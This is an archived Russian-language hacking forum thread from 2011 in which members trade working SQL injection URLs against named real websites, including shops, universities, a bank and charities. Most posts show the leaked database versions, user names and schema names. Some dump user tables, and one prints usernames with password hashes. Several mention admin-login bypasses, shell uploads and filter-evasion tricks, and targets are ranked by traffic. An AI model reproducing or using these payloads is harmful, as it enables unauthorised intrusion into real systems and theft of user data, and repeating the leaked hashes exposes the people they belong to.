Просмотр полной версии : SQL Инъекции
ku6ep_xayS
30.11.2011, 15:57
http://www.sudarushka-shop.ru/catalog.html?item_id=-8+union+select+1,2,3--
____________
5я ветка
раскурить дальше несмог =)
nemaniak
01.12.2011, 00:36
sosedniymir.ru ТИЦ-170
Code:
sosedniymir.ru/profile.php?uid=-8329+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
Code:
5.0.90-log:u98228@10.8.0.166:u98228_cms
kovel.osp-ua.info PR-5 ТИЦ-60
Code:
kovel.osp-ua.info/index.php?news=-39917+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6,7,8,9,10,11,12,13,14+--+
Code:
4.1.22-standard-log:ospuai_ospuai@localhost:ospuai_inbaza
kallstrom
01.12.2011, 02:33
Aspasia Books - Finnish Books
http://www.aspasiabooks.com/News_View.php?ID=-1089 OR 1 GROUP BY CONCAT(CHAR(58,101,117,103,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,106,116,107,58),FLOOR(RAND(0)*2)) HAVING MIN(0)--
PR=5
ТИЦ: 3600 Massachusetts institute of technology
Code:
http://web.mit.edu/press/component/mitexperts/?catid=-71+union+select+1,2,concat_ws%280x3a,version%28%29 ,database%28%29,user%28%29%29,4,5,6,7,8,9,10,11,12 ,13--+
5.0.45:mit:mitdb@COMM-CMS-1.MIT.EDU
42:alex:247dba455802592ff7969e8503638bfc:lYohx3kTM aTLgQLsf0GSoRac7V3nNY9J,
43atrick:d6ab53422ce35b24c2a26e123b53c263:7sJXJNQK oAW0Ouvp7ZoJxrsIxuyH1CFX,
44:Christine:ff7d97e39d70aef53af5f16b68e8d440:mxPv dI967y2KZUT28jzap4FwbDeKpIc0,
ku6ep_xayS said:
http://www.sudarushka-shop.ru/catalog.html?item_id=-8+union+select+1,2,3--
____________
5я ветка
раскурить дальше несмог =)
Inject
Code:
_ttp://www.sudarushka-shop.ru/catalog.html?item_id=8+and+1=2+union+select+1,vers ion(),3+--+
Version = 5.1.41-log
Database = sudarushka_db
User= sudarushka_mysql@10.1.154.182
tght said:
А руками слабо раскрутить?
Солидарен.
Вот разумный вариант
Inject
Code:
_ttp://www.aspasiabooks.com/News_View.php?ID=57+and+1=2+union+select+1,version (),3,4,5,6,7,8,9,10,11,12,13
Version = 5.0.92-50-log
Database = aspasiab_aspasia@localhost
User= aspasiab_aspasia
Я очень люблю постить бояни, но еще не знаю что могу получить бан за это..
cylaaaan
01.12.2011, 15:11
Тиц 50
http://web.ana-mpa.gr/anarussian/articleview1.php?id=-1234+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,39,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56+--+
ku6ep_xayS
01.12.2011, 19:42
4я ветка
http://infores.mpt.gov.by/ir/database/view_ir.php?id=-6729+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65--
//еще одно оффтоп сообщение, и будешь в бане
Konqi
kallstrom
01.12.2011, 22:13
Всем "доброжелателям". Версия в шапке.
http://www.ufanavigator.ru/index.php?id=320&id_company=329&id_price=215642-999.9+union+select+1,version()+--+
И еще:
http://www.remc.ru/company/persons.php?id=67-999.9+union+select+1,2,version()+--+
PR=5
тИЦ=90
Alexa=443,842
aydin-ka
01.12.2011, 22:49
тиЦ 140 Траф ~4K
Code:
http://8a.ru/clat.php?idcla=95&idqa=-1+union+select+1,concat_ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3,4,5,6,7,8--
8aru@localhost:8aru:5.0.45
Таблицы
Code:
http://8a.ru/clat.php?idcla=95&idqa=-1+union+select+1,group_concat(TABLE_NAME),3,4,5,6, 7,8+from+INFORMATION_SCHEMA.TABLES--
Колонки
Code:
http://8a.ru/clat.php?idcla=95&idqa=-1+union+select+1,group_concat(COLUMN_NAME),3,4,5,6 ,7,8+from+INFORMATION_SCHEMA.COLUMNS--
Code:
http://8a.ru/clat.php?idcla=95&idqa=-1+union+select+1,concat_ws(0x3a,ac_ok,id_acc),3,4, 5,6,7,8+from+Account--
LiRvD082
01.12.2011, 23:30
Страшно выкладывать, но об ошибки я им уже давно сообщал
http://www.oceanbank.ru/index.php?page=1&mode=view&id=107481310'
На чужие акки заходил, так что реально
kallstrom
01.12.2011, 23:31
Большой сборник гайдов Dota All Stars
http://dotahelp.ru/gaid.php?id=366-999.9+union+select+1,2,3,4,version(),6,7+--+
PR=4
---------------------------------------------------------------
Russian Darkside
http://www.darkside.ru/reviews/band.phtml?id=72-999.9+union+select+1,version(),3,4,5,6,7,8,9,10+--+
PR=5
тИЦ=1700
Alexa=54,160
kallstrom
02.12.2011, 01:44
UnicumHost хостинг-оператор в Екатеринбурге
http://www.unicumhost.ru/faq_review.php?id=14-999.9+union+select+1,version(),3,4,5,6,7,8+--+
PR=4
------------------------------------------------
Новосибирск. Версия в шапке.
http://www.delsib.ru/sites/page.php?id=654-999.9+union+select+1,2,version(),4,5,6,7,8,9,10,11 +--+
PR=3
тИЦ=60
------------------------------------------------
tut.by - боян
используйте антибоян
http://www.boerboels.ru/main.php?mode=docs&docs=view&id=134-999.9+union+select+1,version(),3,user(),5,6--
5.5.11
boersru@localhost
DB: boersru
http://www.dscon.ru/pressroom/newstext.php?newsid=762-999.9+union+select+1,user(),version(),database(),5 ,6,7--
5.1.55-log
storus_news@localhost
DB: db_storus_news
тИЦ: 230
я буду вместо вас чекать скули на наличие боянов? =\
предупреждение..
kallstrom
02.12.2011, 23:00
Фирма, занимающаяся выставками
http://www.showboxexhibits.com/look.php?id=40-999.9+union+select+version(),2,3,4,5,6,7,8+--+
Производитель люстр
http://www.tkjlamps.com/kaijia/product/look.php?id=1677-999.9+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16+--+
A Thousand Stories
http://www.athousandstories.com/story.php?id=41-999.9+union+select+1,version(),3,4,5,6,7,8,9+--+
БОЯНОВ НЕТ!!!
aydin-ka
02.12.2011, 23:21
тиЦ 60
Code:
http://asgteam.ru/comand_asg/news/?news_id=9999999+union+select+1,2,concat_ws%280x3a ,user%28%29,database%28%29,version%28%29%29,4,5,6, 7,8,9,10,11,12,13,14,15,16,17--
u85031_2@10.8.0.131:u85031_2:5.0.90-log
Code:
http://asgteam.ru/comand_asg/news/?news_id=9999999+union+select+1,2,group_concat(0x3 a,user_login),4,5,6,7,8,9,10,11,12,13,14,15,16,17+ from+asg_users--
kallstrom
03.12.2011, 02:08
WSHU Public Radio Group
http://www.wshu.org/news/story.php?ID=9002-999.9+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17+--+
PR=6
Tecnologi - SITdA associazione per la ricerca nel campo della Tecnologia dell'architettura
http://www.tecnologi.net/wp/curriculum.php?id=202-999.9+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51+--+
PR=5
Universidad Autónoma del Estado de Morelos
http://web.fc.uaem.mx:8080/curriculum.php?invid=48-999.9+union+select+1,2,version()+--+
St LUKES Science and Sports College
http://www.st-lukes.devon.sch.uk/curriculum.php?id=108-999.9+union+select+1,2,version(),4,5,6+--+
Superuse.org: Where recycling meets design
http://superuse.org/story.php?title=manufactured-landscapes-1' AND (SELECT 991 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,119,122,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,106,105,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'ZkBh'='ZkBh
PR=5
БОЯНОВ НЕТ!!!
kravch_v
03.12.2011, 22:39
Code:
http://livefootballwatchsoccer.com//details.php?newsid=999999.9%27+UNION+ALL+SELECT+co ncat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database %28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303 235343830303536%2C0x31303235343830303536%2C0x31303 235343830303536%2C0x31303235343830303536%2C0x31303 235343830303536%2C0x31303235343830303536%2C0x31303 235343830303536+and+%27x%27%3D%27x
User: livefoot_shanto@localhost
Версия скули: 5.1.56
Текущая БД: livefoot_dbfoot
Базы данных: information_schema, livefoot_dbfoot
//в след раз не выложить иньекции в таком виде
Благотворительный фонд Устина Мальцева
HTML:
http://www.ymfund.org.ua/red_page.htm?id=-1+union+select+user()--+f
Крутить дальше совесть не позволяет =/ Админам сообщил и предложил бесплатную помощь...
БоЯн
http://webstat.ws/st.php?st=63-999.9+union+select+1,2,3,version(),5,6,7,8,9,10,11--
5.0.91-log
siarzhuk_webstat@localhost
DB: siarzhuk_webstat
http://center-bespeki.com.ua/view.php?item=282-999.9+union+select+1,2,3,4,5,6,7,8,9,user(),versio n(),12,13,14,15,16,database(),18,19,20,21,22,23,24 ,25,26,27--
5.1.49-3-log
center_center@localhost
DB: center_base
Sidarovich1975
04.12.2011, 15:51
http://www.mp3ball.com/sms/view_soft.php?sms=-22'+union+select+1,concat_ws(0x2e,user(),version() ,database()),3,4,5+from+admin+--+
user: rajwinde_rdx@localhost
version: 5.1.56
database: rajwinde_rdx
shadowrun
04.12.2011, 21:50
Code:
http://www.business-college.com.ua/games/index.php?id=-2%27+union+select+1,2,group_concat%28table_name%29 +from+information_schema.tables+where+table_schema =database%28%29+--+
Osstudio
04.12.2011, 22:06
URL:
Code:
http://medem.kiev.ua/page.php?pid=124%27+and+1=0+union+select+1,2,3,4,5 ,6,group_concat%28concat_ws%280x3a3a3a,id,login,pa sswd,fullname,email,group_id%29+separator+0x0b%29, 8,9,10,11,12,13,14,15+from+cms_users+limit+0,20+--+
Database: li0n_medem
Version: 5.1.58-1~dotdeb.1-log
User: li0n_medem@localhost
тИЦ: 80
PR: ?
kallstrom
04.12.2011, 22:32
Y2Neil.com – the home of wannabe nobody Neil Brazier
http://www.y2neil.com/reviews/review.php?id=41-999.9+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12+--+
Searchable library of NES games with reviews
http://www.games4nintendo.com/nes/review.php?id=6-999.9+union+select+1,version(),3,4,5+--+
Ресторан Метрополь
http://metropole.com.ua/index.php?id=40-999.9+union+select+1,version(),3,4,5,6,7,8,9+--+
Weller Pools LLC, Commercial Pool Contractor and Aquatic Design
http://www.wellerpools.com/news-read.php?id=22-999.9+union+select+1,version(),3,4,5,6,7,8,9,10+--+
SourceIsrael
http://www.sourceisrael.com/read.php?id=104-999.9+union+select+1,version(),3,4,5,6,7,8,9,10,11 +--+
БОЯНОВ НЕТ!!!
http://efmggu.ru/index.php?table=others&id=-1%20UNION%20SELECT%201,2,3,4,version()
PR 4
stepashka_
05.12.2011, 17:18
http://landandsearealtyinc.com/Newss.php?id=59+union+select+1,2,concat_ws(0x3a,ve rsion(),user(),database()),4,5,6,7,8+--+
5.0.77-log:332761_lsusr@172.16.11.108:332761_landsea
kallstrom
05.12.2011, 21:49
New Dimensions Media : Changing the World One Broadcast at a Time
http://www.newdimensions.org/read.php?id=999.9'+union+select+1,2,version(),4,5, 6+--+
PR=6
Bee for Battens - The Irish campaign to raise awareness and support those affected by Battens Disease
http://www.beeforbattens.org/blog-read.php?id=57-999.9+union+select+1,2,version(),4,5,6,7,8,9,10,11 +--+
PR=4
Revadim: Study of Jewish Oral Torah Tradition in Mishnah and Talmud
http://www.talmud-revadim.co.il/read.php?id=10-999.9+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15+--+
PR=3
Free Porn Videos Porntubehunter Porn Movies Xhamster
http://www.porntubehunter.com/video.php?id=16813-999.9+union+select+1,2,version(),4,5,6,7,8+--+
PR=3
Версия выводится на нижней правой превьюшке
COLLEGE SLUTZ
http://collegeslutz.com/index.php?id=1548-999.9+union+select+1,version(),3,4,5,6,7+--+
babelport.com is the translation industry information and project portal
http://www.babelport.com/news/readnews.php?id=281-999.9+union+select+1,2,3,4,5,version(),7,8,9,10,11 +--+
PR=4
БОЯНОВ НЕТ!!!
http://www.titoff.ru/news/print.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12 ,13,14,15+from+information_schema.tables+news+limi t+24,1--&gid=4
DezMond™
06.12.2011, 14:31
https://www.digipen.edu/?id=1170&proj=(18579)%22+and(select+1+from(select+count(*), concat((select+2+from+%60typo3db%60.be_users+limit +1,1),floor(rand(0)*2))x+from+%60typo3db%60.be_use rs+group+by+x)a)--%22
Таблы только подобрать...
stepashka_
06.12.2011, 15:16
http://www.moto-server.ru/desk/index.php?id_categ=5+union+select+1,2,3,4,5,6,conc at_ws(0x3a,user(),version(),database()),8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8+--+
SRV16462_M@C21-W.HT-SYSTEMS.RU:5.1.57-LOG:SRV16462_MOTO
http://best-generic-drugs.com/index.php?sectiune=5&lang=ru&id_categ=-12+union+select+1,table_name,3,4+from+information_ schema.tables+limit+22,1+--+
Может кому нибудь хватит терпения через лимит крутить))
http://best-generic-drugs.com/admin
Osstudio
06.12.2011, 23:47
Поддомен msn.com
URL:
Code:
http://recettes.styledevie.ca.msn.com/forum/message.php?id=292963+and+1=0+union+select+1,2,3,4 ,group_concat%28concat_ws%280x3a3a3a,password,pseu donyme%29+separator+0x0b%29,6,7,8,9,10,11+from+mem bres+WHERE+pseudonyme=%27Hope%27+limit+0,20--
Database: recettes
Version MySQL: 5.1.38-community-log
User: recettes@mtl2tcesxweb16.tcm.int
Сначала скуль была под грифом "Top Secret", теперь, думаю могу её запостить!
-----------------------------------------------------------------------------
URL:
Code:
http://crimeahouse.net/doska/ind.php?id_typ=-6+union+/*!select*/+1,2,3,4,5,6,%28/*!select*/%28@x%29from%28/*!select*/%28@x:=0x00%29,%28/*!select*/%28null%29from%28information_schema./*!columns*/%29where%28table_schema!=0x696e666f726d6174696f6e5 f736368656d61%29and%280x00%29in%28@x:=/*!concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29*/%29%29%29x%29,8,9,10,11,12,13,14,15,16,17,18,19,20 +--+
Database: crimeaho_doska
Version MySQL: 5.0.92-community
User: crimeaho_admin@localhost
тИЦ: 10
PR: 1
-----------------------------------------------------------------------------
URL:
Code:
http://www.totalmma.ru/biography.php?id=2+and+1=0+union+select+1,concat_w s%280x3a3a3a,user%28%29,database%28%29,version%28% 29%29--
Database: fightn_mma
Version MySQL: 5.1.56
User: fightn@localhost
тИЦ: 0
PR: 1
P.S Шелл лил не через скулю
stepashka_
07.12.2011, 12:19
http://allmedsnow.biz/index.php?sectiune=5&lang=ru&id_categ=-41+union+select+1,table_name,3,4+from+information_ schema.tables+limit+22,1+--+
ещё один шоп))
ВИАГРА + сюприз
№1
HTML:
http://acomplia.viagranow.eu/getdata.php?id=1+union+select+version(),2--+f
№2
HTML:
http://online-viagranow.com/getdata.php?id=1+union+select+version(),2--+f
№3
HTML:
http://reductil-meridia.biz/getdata.php?id=1+union+select+version(),2--+f
№4
HTML:
http://viagra-freeonline.biz/getdata.php?id=1+union+select+version(),2--+f
№5
HTML:
http://viagranow.biz/getdata.php?id=1+union+select+version(),2--+f
№6
HTML:
http://www.meds4u.eu/getdata.php?id=1+union+select+version(),2--+f
№7
HTML:
http://www.viagra-4u.com/getdata.php?id=1+union+select+version(),2--+f
№8
HTML:
http://www.viagra-enligne.com/getdata.php?id=1+union+select+version(),2--+f
А вот и сюприз. Все сайты на одном сервере, по следам stepaska_
http://www.show.ru/
http://www.show.ru/img/showru.gif
http://www.show.ru/index.php?cat=247&eventId=-46589%20and%201=2%20union%20select%20concat_ws(cha r(58),@@version,user(),database(),@@version_compil e_os)+--
5.0.77-log admin_beta@83.222.2.225 admin_beta redhat-linux-gn
если кому не лень.....добивайте....http://www.show.ru/index.php?cat=247&eventId=-46589%20and%201=2%20union%20select%20table_name+fr om%20information_schema.tables%20limit%2017524,1--
Pirotexnik
08.12.2011, 15:06
офф сайт СMS
Code:
http://www.jasawebsitemurah.info/cms/view.php?idArtikel=1+union+select+1,2,3,concat_ws( 0x3a,username,password),5,6,7,8+from+jasaweb_cms.u ser+limit+0,1+--+
пароли/хеши нельзя выкладывать
Pirotexnik
09.12.2011, 13:44
Code:
http://student.d3ti.mipa.uns.ac.id/arkan/view.php?idArtikel=-19+union+select+1,2,concat_ws(%200x3a,username,pas sword),4,5,6,7,8+from+user+limit+0,1+--+
aydin-ka
09.12.2011, 22:22
тИЦ 100
Code:
http://fortland.ru/index.html?action=news&act=news_p&id=99999999/*--*/UnIoN/*--*/SeleCt/*--*/1,@@version,3,4,5,6,7,8--
P.S: через несколько секунд "выбрасывает" на другую страницу....
Code:
http://fortland.ru/index.html?action=news&act=news_p&id=99999999/*--*/UnIoN/*--*/SeleCt/*--*/1,group_concat%28TABLE_NAME%29,3,4,5,6,7,8/*--*/FrOm/*--*/INFORMATION_SCHEMA.TABLES--+
cylaaaan
10.12.2011, 02:06
Тиц 70
http://www.open-pasport.ru/dop_infa.php?pid=-1+UnIoN+seLEct+1,2,3--
Тиц 1500
www.iteam.ru
PHP:
http://www.iteam.ru/articles.php?pid=1&tid=2&sid=16&id=-131/**/UnION/**/SeLEcT/**/1,2,UNHEX(HEX(version())),4,5,6,7--
Тиц 210
www.ndelo.ru
Code:
http://www.ndelo.ru/survey.php?qid=241+union+select+1,2,3,4,5,6,7,8,9, 10,11--&r=0.19475362145586483
Давайте вместе раскрутим эту скулю, фильтруется слово select
Pirotexnik
10.12.2011, 06:52
cylaaaan said:
Давайте вместе раскрутим эту скулю, фильтруется слово select
Я могу ошибатся, но помоему не выйдет. Долбался с таким методом защиты, он все запросы приводит к нижнему регистру и сверяет ключами. Если там есть структуры типа +select - отсекается запрос. Надежда только на другие запросы, т.к. фильтруют в основном get\post.
Попробуй кук\хедер. Я не дома, попробовать не выйдет
cylaaaan said:
Тиц 70
Давайте вместе раскрутим эту скулю, фильтруется слово select
Кроме blind вариантов не вижу...
database():ndelo_bases
stepashka_
11.12.2011, 00:57
http://www.unidata.com.ua/index.php?pg=14&id_c=5&id_t=-13+union+select+version()+--+
http://www.navigat.ru/good.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11,12
stepashka_
12.12.2011, 15:30
http://www.prodam-kvarti.ru/index.php?id=4&id_cat=-3+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3+--+
jeltiy_mysql@10.1.53.191:5.1.41-log:jeltiy_db
http://www.sevportal.com/link/index.php?id=7&cat=-10+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6+--+
c1_sevportal@localhost:5.1.41-3ubuntu12.10:c1_sevportal
cylaaaan
12.12.2011, 18:19
Автомобильный завод "УРАЛ"
Тиц 950
Code:
http://www.uralaz.ru/motor_show.php?id=-13/**/unIoN/**/seLect/**/1,version(),3,4,5--&sub=1
4.0.20-log
shadowrun
12.12.2011, 21:15
Code:
http://interpretive.ru/dictionary/459/word/-1218%27+union+select+1,2,3,4,5,6,7,8,9,group_conca t%28table_name%29,11,12,13+from+information_schema .tables+where+table_schema=database%28%29+--+
5.1.57
Тиц - 275
PR - 5
stepashka_
12.12.2011, 22:40
http://www.sizampskov.ru/news.php?id_new=127+union+select+1,2,3,4,5,6,conca t_ws(0x3a,user(),version(),database()),8,9+--+
sizampskov_sizam@localhost:5.0.77-log:sizampskov_sizam
http://www.studiovitrum.ru/news.php?id_new=-6+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6,7,8,9+--+
studiovitrum_v@localhost:5.0.77
http://www.pskovproject.ru/news.php?id_new=20+union+select+1,2,3,4,table_name ,6,7,8,9+from+information_schema.tables+--+
http://www.aquaindustri.ru/news.php?id_new=57+union+select+1,2,3,4,5,table_na me,7,8,9+from+information_schema.tables+--+
http://sdnn.ru/new.php?id_new=-13+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3, 4,5,6,7+--+
5.1.41-log
http://www.creacon.ru/new.php?id=-276+union+select+1,2,3,version(),5+--+
4.1.24-log
shadowrun
13.12.2011, 01:12
Code:
http://www.pn.mk.ua/servicepages.php?%20type_page=-contacts%27+union+select+concat_ws%280x3b,Version% 28%29,database%28%29,user%28%29%29+--+
5.2.4-MariaDB;prestupnos_db;root@localhost
ТИЦ - 450
PR - 4
Code:
http://www.eustudies.org/conference.php?cid=-6+union+select+1,2,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12, 13,14--
eusa_w@209.68.1.89:5.0.91-log:eusa_main
GooglePR: 6
ТИЦ: 2100
Code:
http://vn.ru/index.php?id=-103788+union+select+1,concat_ws%280x3a,version%28% 29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+
5.1.50-log:sibkray_site:sibkray_site@localhost
stepashka_
13.12.2011, 10:20
http://www.dominion-el.ru/page.php?id=-11+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6+--+
4.0.22-standard:root@localhost:domsite
http://cplay.ru/game.php?id=-13+union+select+1,version(),3,4,5,6,7,8,9,0,1+--+
5.0.51a-community
http://s1701.zouo.ru/site.php?id=-15+union+select+unhex(hex(version())),2,3+--+
4.1.16-nt
http://yaroslavl.ecologyandculture.ru/index.php?id=-34+union+select+concat_ws(0x3a,user(),version(),da tabase())+--+
ecologyand_voron@localhost:5.0.26-log:ecologyand_voron
http://metratech.ru/pages.php?id=-31+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5+--+
5.1.41-log:metratech_mysql@10.1.118.27:metratech_db
http://adygheya.minobr.ru/new.php?n=-61+union+select+1,concat_ws(0x3a,version(),user(), database())+--+
5.0.88:mo@localhost:mo
http://www.nedvijimostbolgarii.com/pages.php?id=-51+union+select+1,version(),3,4,5,6,7,8+--+
5.0.92-community
shadowrun
13.12.2011, 20:42
http://www.si-ultra.biz/catalog/seria.php?k=12+or+1+group+by+concat%28concat_ws%28 0x3a,version%28%29,database%28%29,user%28%29%29,fl oor%28rand%280%29*2%29%29having+min%280%29+or+1--+
5.0.90-log:u90152:u90152@10.8.0.1111
http://happyfish.com.ua/index.php?productID=692%27+or+1+group+by+concat%28 concat_ws%280x3a,database%28%29,user%28%29,version %28%29%29,floor%28rand%280%29*2%29%29having+min%28 0%29+or+1+--+
happyfish_new:happyfish_new@localhost:5.1.54-1ubuntu41
http://www.photokiselev.com/info.php?CID=4+or+1+group+by+concat%28concat_ws%28 0x3a,version%28%29,user%28%29,database%28%29%29,fl oor%28rand%280%29*3%29%29having+min%280%29+--+
5.0.90-log:u36043@10.8.1.171:u360431
aydin-ka
13.12.2011, 23:34
тИЦ 550
Code:
http://jjew.ru/index.php?id=44&tpk=999999999+union+select+1,2,3,@@version,5--
4.1.20-lk-log
stepashka_
13.12.2011, 23:55
http://www.otdihayka.ru/play.php?id=-11'+union+select+1,2,3,concat_ws(0x3a,user(),versi on(),database())+--+
QfF4DJHVTBXkEV61@localhost:5.1.58tdihayka-ru
http://militarizm.1gb.ru/games.php?act=show&id=-853'+union+select+1,2,unhex(hex(version())),4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9+--+
4.1.13a-nt-max-log
http://vesna-kuban.ru/games.php?id=-2+union+select+1,version(),3,4,5,6,7+--+
5.0.77-log
http://elfquest.imagesofher.com/game.php?action=Game&ID=-1'+union+select+version()+--+
Osstudio
14.12.2011, 00:19
ht*p://www.ruspole.ru/company/news.php?id=337+and+1=0+union+select+1,2,group_con cat%28concat_ws%280x3a,user_level,username,user_pa ssword%29+separator+0x0b%29,4,5+from+phpbb_users+l imit+0,20--
Тиц: 60
PR: 3/10
Пользователей в форуме ~ 10 000
Code:
http://www.trans-health.com/displayarticle.php?aid=-62+union+select+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29,2,3,4,5,6,7--
thcms@localhost:5.1.38:th_cms
GooglePR: 6
Code:
http://www.liedcenter.org/events/detail.php?eid=-134+union+select+1,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,3,4,5,6,7,8,9,10--
db60773@72.47.228.28:5.1.26-rc-5.1.26rc-log:db60773_lied
GooglePR: 6
stepashka_
14.12.2011, 11:19
http://xbox-unlock.ru/game.php?id=-2+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3,4 ,5,6,7,8+--+
5.0.87-percona-highperf-log
Osstudio
14.12.2011, 17:32
http://nnasos.ru/news.php?id=17+and+1=0+union+select+1,2,version%28 %29,4--
Тиц: 10
PR: 0
Админка: http://nnasos.ru/admin/
Обход ввода логина и пасса - ничего не вводить, и появяться полные права. Через фотки можно залить шелл
http://www.novoship.ru/info-view.php?id=108%27+and+1=0+union+select+1,version% 28%29,database%28%29,user%28%29,5,6,7,8,9,10,11,12 ,13,14,15+--+
4 ветвь
тИЦ: 150
PR: 4
shadowrun
14.12.2011, 21:49
Прости Господи.
Code:
http://www.rusderjavnaya.info/article.php?art_id=463+and+1=0+union+select+1,conc at_ws%280x3a,version%28%29,database%28%29%29+--+
5.0.92-log:rusderj1_kelscms
ТИЦ - 300
PR - 4
stepashka_
15.12.2011, 10:04
http://www.robbi.ru/info.php?id=-1425+union+select+concat_ws(0x3a,user(),version(), database()),2,3,4,5+--+
rintek3_robbi@212.193.225.160:5.1.41-log:rintek3_robbi
http://www.otalant.ru/info.php?id=-7'+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3, 4,5,6,7+--+
5.0.26-lk-log
хостинг sweb дальше не пускает..
aydin-ka
15.12.2011, 18:07
тИЦ 240
Code:
http://74dom.ru/laws.php?row=99999999+union+select+1,2,concat_ws%2 80x3a,user%28%29,database%28%29,version%28%29%29,4 ,5,6,7,8,9--+
u58291@10.8.0.129:u58291_74dom:5.0.90-log
Code:
http://74dom.ru/laws.php?row=99999999+union+select+1,2,group_conca t%28login%29,4,5,6,7,8,9+from+password--+
P.S: ооочень много таблиц
shadowrun
15.12.2011, 22:04
http://kellieblincophotography.com.au/viewblog.php?bid=9999999+union+select+1,concat_ws% 280x3b,version%28%29,database%28%29,user%28%29%29+--+
5.0.92-community;riverspl_kellie;riverspl_riversp@localho st
http://underground.alpine-usa.com/RocktheDash/band_index.php?bid=1902%27+or+1+group+by+concat%28 version%28%29,floor%28rand%280%29*2%29%29having+mi n%280%29+--+
5.0.841
PR - 5
http://www.goldensunsetvillas.gr/room.php?rid=-3%27+/*!union*/+select+1,2,concat_ws%280x3a,version%28%29,databas e%28%29,user%28%29%29,4,5,6,7,8,9,10,11,12+--+
5.0.91-community:goldhots_db:goldhots@localhost
stepashka_
16.12.2011, 12:07
http://al-boos.ru/static/article.php?id=6'+union+select+concat_ws(0x3a,user (),version(),database())+--+
al_boos@kayj.net:5.1.39-log:al_boos
Osstudio
16.12.2011, 23:11
http://nick-name.ru/register/
ТИЦ: 600
ПР: 4
Уязвимы все поля, данные отправляются методом POST...
VERSION: 5
DB: nickname
stepashka_
16.12.2011, 23:53
http://iqonline.ru/ind.php?p=book&id=-122+union+select+1,2,3,table_name,5+from+informati on_schema.tables+--+
юзверей нету(
http://thepost.us.com/article.php?id=-295%20union%20select%201,2,id,concat%28username,ch ar%20%2858%29,password%29,5,6,7,8,9,0,11,12%20from %20users--
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
shadowrun
17.12.2011, 14:34
http://nomad.kiev.ua/index.php?searchstring=%3Cfuck%3E&x=6&y=3&categoryID=0+or+1+group+by+concat%28version%28%29, floor%28rand%280%29*2%29%29having+min%280%29+--+
http://www.urbanian.ru/show.php?blogmessageid=-0805071659225%27+union+select+1,2,3,concat_ws%280x 3a,version%28%29,database%28%29,user%28%29%29,5,6, 7+--+
5.0.51a-community-nt-log:1gb_urbanian:1gb_urbanian@10.0.2.5
http://pallotyni.org.ua/index.php?articles=sv_Vikentiy_Pallotti_%96_aposto l%27+and+1=0+union+select+concat_ws%280x3a,databas e%28%29,version%28%29,user%28%29%29+--+
deer_pall:5.1.49-3:deer@localhost
http://tornado.vn.ua/index.php?productID=826%27+or+1+group+by+concat%28 concat_ws%280x3a,version%28%29,database%28%29,user %28%29%29,floor%28rand%280%29*2%29%29having+min%28 0%29+or+1--+
5.1.43:vdhivinua_td:vdhivinua_td@localhost1
stepashka_
17.12.2011, 15:18
http://www.tigranav.net/pages.php?id=-1+union+select+1,2,3,4,5,version(),7,8+--+
5.0.90
shadowrun
17.12.2011, 18:07
http://www.oregonshores.org/resource.php5?nid=-364+union+select+1,2,version%28%29,4,5,6,7,8,9,10, 11,12,13,14,15,16+--+
5.0.92-log
http://www.cccindy.com/view_article.php?aid=-2+union+select+1,2,version%28%29,4,5,6,7,8+--+
4.1.22-standard
http://www.muzkom.net/afisha/show.php?aid=19+or+1+group+by+concat%28version%28% 29,floor%28rand%280%29*2%29%29having+min%280%29+or +1--+
5.0.82-log1
CY - 230
PR - 5
http://www.pretext.ru/index.php?aID=1+or+1+group+by+concat%28version%28% 29,floor%28rand%280%29*2%29%29having+min%280%29+or +1--+
4.0.261
CY - 100
PR - 4
aydin-ka
18.12.2011, 00:52
тИЦ 90
Code:
